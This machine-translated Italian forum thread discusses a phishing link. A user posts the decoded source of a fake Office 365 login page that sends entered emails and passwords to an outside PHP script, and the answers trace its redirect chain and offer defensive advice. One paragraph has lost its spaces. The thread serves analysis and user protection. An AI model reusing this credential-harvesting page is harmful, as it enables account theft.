Accidentalmente clicca su un link di phishing, è pericoloso?

Question

Accidentalmente clicca su un link di phishing, è pericoloso?

#1 da (0 voti)
#2 da (0 voti)

-1

Non è sicuro che sia questo il posto giusto per porre una domanda come questa.

Ho fatto accidentalmente clic su un link dalla mia email, mi porta in uno strano sito Web con un URL molto lungo.

Dopo aver effettuato una ricerca su Google per un po 'di tempo, ho trovato dei modi per convertirlo in un testo leggibile, ma non ho idea di cosa faccia e quanto sia pericoloso, ci sono esperienze di persone qui che possono darmi una mano?

<script type="text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Sign in to Office 365</title>
<meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com">
<link href="http://thesimnews.com/box/owa/Untitled1.css" rel="stylesheet">
<link href="http://thesimnews.com/box/owa/nickeloffice.css" rel="stylesheet">
<script src="http://thesimnews.com/box/owa/jquery-1.11.1.min.js"></script><scriptsrc="http://thesimnews.com/box/owa/wwb10.min.js"></script>
<script>
$(document).ready(function()
{
   LoadValue('Editbox1', 'local', 0);
   LoadValue('Editbox2', 'local', 0);
   LoadValue('Checkbox1', 'local', 1);
   $("#Form1").submit(function(event)
   {
      StoreValue('Editbox1', 'local', 0);
      StoreValue('Editbox2', 'local', 0);
      StoreValue('Checkbox1', 'local', 1);
      return true;
   });
});
</script>
</head>
<body>
<div id="wb_Image1" style="position:absolute;left:0px;top:1px;width:1327px;height:666px;z-index:4;">
<img src="http://thesimnews.com/box/owa/images/Capture.PNG"id="Image1" alt=""></div>
<div id="wb_Text1" style="position:absolute;left:892px;top:160px;width:211px;height:16px;z-index:5;text-align:left;">
<span style="color:#DC143C;font-family:'Lucida Sans Unicode';font-size:13px;">Please login to continue upgrade</span></div>
<div id="wb_Form1" style="position:absolute;left:878px;top:174px;width:363px;height:174px;z-index:6;">
<form name="Form1" method="post" action="http://thesimnews.com/box/owa/result.php" enctype="multipart/form-data" accept-charset="UTF-8" target="_self" id="Form1">
<input type="hidden" name="formid" value="form1">
<input type="email" id="Editbox1" style="position:absolute;left:14px;top:11px;width:342px;height:24px;line-height:24px;z-index:0;" name="Email" value="" placeholder="[email protected]">
<input type="password" id="Editbox2" style="position:absolute;left:14px;top:47px;width:342px;height:24px;line-height:24px;z-index:1;" name="Password" value="" placeholder=" Password">
<input type="checkbox" id="Checkbox1" name="" value="on" style="position:absolute;left:11px;top:85px;z-index:2;">
<input type="submit" id="Button1" name="" value="" style="position:absolute;left:14px;top:136px;width:66px;height:31px;z-index:3;">
</form>
</div>
</body>
</html>'));
//-->
</script>

phishing

posta ra13110 29.07.2016 - 09:00

fonte

2 risposte

0

Introduzione:

Accidentally click a phishing link, is it dangerous?

Le pagine stesse non sembrano contenere malware (anche se alcuni codici non sono visualizzabili!), ma è un insieme di pagine non ufficiali che imitano le pagine ufficiali, quindi è potenzialmente pericoloso visitare o inserire informazioni in. Non consiglierei a nessuno di visitare l'URL , anche se allo scopo di rispondere a questa domanda, senza prendere precauzioni.

Esame:

Percorso:

http://bit.ly/2aw86ME --> http://thesimnews.com/box/owa/adf.php --> data:text/html;base64,PHNjcml... [trimmed to avoid infringement] --> http://thesimnews.com/box/owa/result.php [302 Moved] --> http://thesimnews.com/box/owa/loading.php --> data:text/html;base64,PHNjcmlwdC.. [trimmed to avoid infringment] --> https://login.microsoftonline.com/

dettagli:

bit.ly è un popolare servizio di abbreviazione di URL. thesimnews.com sembra essere un blog di notizie di proprietà di Lucas Ulor (potrebbe non essere il suo vero nome). Sulla base dell'indirizzo IP, credo che sia ospitato da Versaweb LLC. Il sito n. 3 ha un lungo URL, perché in realtà non è un URL. È un uri di dati (popolare con gli attaccanti, ma non il male per conto proprio). I dati decodificati sono javascript contenenti dati HTML crittografati. La pagina riproduce un login di Office 365. Nonostante sia un data uri, richiama diverse risorse da thesimnews.com incluse immagini e javascript.

Dopoaverinviatoilmodulodiaccesso,utilizzaPOSTperinviarel'emailelapassworddell'utenteaun'altrapaginasuthesimnews.com.Questapaginaèunapaginaphp,quindinonpossodireinteramentequellochefa,perchévedosololepartidelcodicecheessoproducealvisitatore,madaquellochepossovederecontienecodicejavascriptchereindirizzal'utenteaunaltrourididatichecontienejavascriptcondatiHTMLcrittografati.Questapaginamostraunmessaggiodicongratulazioni(questapaginautilizzaancheimmaginiejavascriptdithesimnews.com),

e quindi reindirizza a un sito ufficiale Microsoft.

Conclusione:

Sembra un tentativo di sottrarre le credenziali di accesso a Office 365. Meno male che non hai effettuato il login:).

concequences:

Il tuo IP è stato esposto a Lucas Ulor visitando il suo sito. Affinché un hacker possa attaccarti, questa è la prima cosa che lui / lei deve sapere (dove sei).
Il tuo indirizzo email potrebbe anche essere esposto a Lucas Ulor perché il link bit.ly inviato via email potrebbe essere unico per te.

Risposta:

Azioni consigliate:

Se non hai una password di posta elettronica sicura, procurane una.
Se si dispone di un account Office 365, utilizzare la stessa e-mail e non disporre di una password di Office 365 sicura, procurarsene uno.
Se il tuo provider di posta elettronica ha una funzione di rapporto, segnala l'e-mail in modo che spero che il tuo provider di posta elettronica bloccherà l'invio di email simili ad altre persone, sei tu l'eroe:).
Guarda le attività insolite nel firewall del tuo computer nel prossimo istante. In caso di tentativi di hacking sul tuo computer.

Se segui queste azioni suggerite, tieni presente che NON sono un esperto di sicurezza, ma un passante interessato, che procrastina invece di fare ciò che dovrebbe essere.

Azioni aggiuntive:

Effettua una scansione completa dei virus. Le pagine stesse erano al sicuro da quello che potevo vedere (anche se non tutto il codice era esposto), ma se sei stato hackerato da quando sei stato in visita, qualcosa di malevolo potrebbe essere sul tuo computer ormai.
Esegui il backup dei tuoi dati, così sei pronto in caso di attacco.
Ottieni un nuovo indirizzo IP. La maggior parte dei provider Internet utilizza IP dinamici (che cambiano) a meno che non si paghi un extra per uno statico (permenant), quindi potresti essere in grado di ottenere un nuovo IP disconnettendo il tuo modem per un po '. In alternativa, contatta il tuo fornitore di servizi Internet per vedere se ne darà uno nuovo.

TL; DR

Sembra un tentativo di sottrarre i dettagli di accesso di Office 365. Il tuo IP è stato esposto e potrebbe essere utilizzato per aiutare un attacco al tuo sistema, quindi tieni d'occhio attività insolite sul tuo computer.

risposta data 31.07.2016 - 03:22

fonte

Leggi altre domande sui tag phishing

Come implementare la sicurezza con il back-end dei servizi mobili di Azure? Utilizzo di SQL per confrontare le password con hash

score 0 · Accepted Answer

Se la pagina consiste solo in questo codice e, è ok. Per quello che vedo, questa pagina consiste solo in una forma. Se non invii le tue informazioni (email + password) attraverso di esso, non ci sono rischi.

Sarei sorpreso se ci fossero altri vettori di attacco in questo tipo di pagina di phishing.

MODIFICA: Per maggiori informazioni a riguardo, questo "testo" è il codice sorgente della pagina. Contiene un modulo html che può essere (ed è spesso) utilizzato su siti legittimi per le pagine di accesso. Per rilevare attacchi di phishing su pagine come questa, puoi utilizzare diversi fattori: * L'url (inizia con un IP, il nome del sito web è scritto male ...) * Il codice sorgente: come puoi vedere, punta a " link ", che non è un sito microsoft * altri fattori (pagina lenta, cattiva scrittura, cattiva immagine / aspetto della pagina ...)

In un modo più generale, evita di fare clic sui link nella posta a meno che tu non sia sicuro della sua origine e, se ti chiede di accedere, vai sulla pagina principale del sito (che sai essere OK) e registrati da lì.